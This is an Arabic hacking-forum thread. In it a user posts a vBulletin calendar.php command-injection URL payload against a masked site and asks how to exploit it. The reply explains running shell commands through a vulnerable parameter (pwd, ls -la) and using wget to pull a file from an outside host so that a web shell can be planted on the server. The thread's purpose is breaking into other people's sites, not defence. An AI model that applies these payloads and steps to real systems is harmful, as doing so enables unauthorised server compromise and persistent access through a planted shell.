ثغرة remote command execution

ثغرة remote command execution


النتائج 1 إلى 2 من 2

الموضوع: ثغرة remote command execution

العرض المتطور

المشاركة السابقة المشاركة السابقة   المشاركة التالية المشاركة التالية
  1. #1

    افتراضي ثغرة remote command execution

    لقد وجدت هذة الثغرة و ارجو ان تفيدونى كيف استغلال هذة
    xxxx.com/calender.php?calbirthdays=1&actions=getday&day=200 1-8-15&
    comma=%22;echo%20' ' ,%20echo%20%60id%20%60;die<>;echo%22 :
    vbulletin allows remote command execution
    ارجوكم

  2. #2
    هكر مجتهد الصورة الرمزية Hidden pain
    تاريخ التسجيل
    May 2010
    الدولة
    بلد المليون و نصف المليون شهيد
    المشاركات
    592

    افتراضي رد: ثغرة remote command execution

    أخي الكريم
    ثغرات ال cgi او هي عبارة عن ثغرة تسمح بتنفيذ أوامر اللينكس على السرفر
    مثلا معك الوقع مصاب بالثغرة target.com و الإصابة هنا =file.php?id
    سيكون الاستغلال هكذا لمعرفة مسارك على السرفر target.com/file.php?id=pwd
    و file.php?id=ls -la لمعرفة الملفات على المجلد اللي أنت عليه الآن
    و wget http://www.....com/file.zip لتنزيل الملف المطلوب على المجلد اللي أنت عليه ... استبدل الملف بالشل و عيش
    ---------------------
    أخي هناك الكثير من الدورات القيمة في المنتدى أنصحك بها


المواضيع المتشابهه

  1. ثغرة remote file inclusion +ثغرة جديدة +طريقة الإستغلال
    بواسطة millen!um في المنتدى قسم الثغرات
    مشاركات: 17
    آخر مشاركة: 01-29-2012, 12:11 AM
  2. شرح استغلال ثغرات command execution
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 46
    آخر مشاركة: 12-11-2011, 03:42 PM
  3. ثغره جديده للمتصفح 7 Remote Code Execution
    بواسطة Spy4Man في المنتدى منتدى الإختراق العام
    مشاركات: 4
    آخر مشاركة: 08-24-2010, 05:43 AM
  4. استغلال ثغرات Command ExecuTion
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم الثغرات
    مشاركات: 6
    آخر مشاركة: 08-09-2010, 10:06 PM
  5. Remote Command Execution
    بواسطة الهكر المجهول في المنتدى قسم الثغرات
    مشاركات: 0
    آخر مشاركة: 01-22-2010, 10:06 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •